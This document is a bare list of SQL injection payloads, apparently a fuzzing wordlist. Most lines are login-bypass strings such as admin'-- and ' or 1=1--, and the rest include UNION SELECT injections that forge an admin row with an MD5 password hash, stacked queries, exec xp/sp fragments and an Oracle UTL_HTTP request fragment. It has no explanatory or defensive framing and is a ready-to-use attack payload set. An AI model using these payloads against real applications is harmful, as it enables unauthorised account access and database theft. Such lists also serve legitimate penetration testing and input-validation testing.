admin'--
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
'
"
#
-
--
'%20--
--';
'%20;
=%20'
=%20;
0 or 1=1
' or 0=0--
" or 0=0--
or 0=0--
'or 0=0#
" or 0=0 #
hi" or 1=1--
hi' or 1=1--
hi' or 'a'='a
hi') or ('a'='a
hi")or("a"="a
@variable
,@variable
PRINT
PRINT@@variable
like
handler
bfilename
'or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
exec xp
exec sp
(
%28
)
%29
&
%26
!
%21
'or1=1 or "='
'or"='
x'or1=1 or 'x'='y
/
//
//*
*/*
'UNION SELECT
'UNION ALL SELECT
'or (EXISTS)
'(select top1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
&lt;&gt;&quot;'%;)(&amp;)
1;SELECT%20*
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
admin' # /*when user is admin */
admin' -- /space after double dash/
admin' or 1=1 #
admin' and 1=1 #
' or 2>1 # /when username is not known/
" or 2<1 # /When user input is quoted under double dash/
' or 1=1 LIMIT 1 #
' | 1=1 #
' & 2=2 #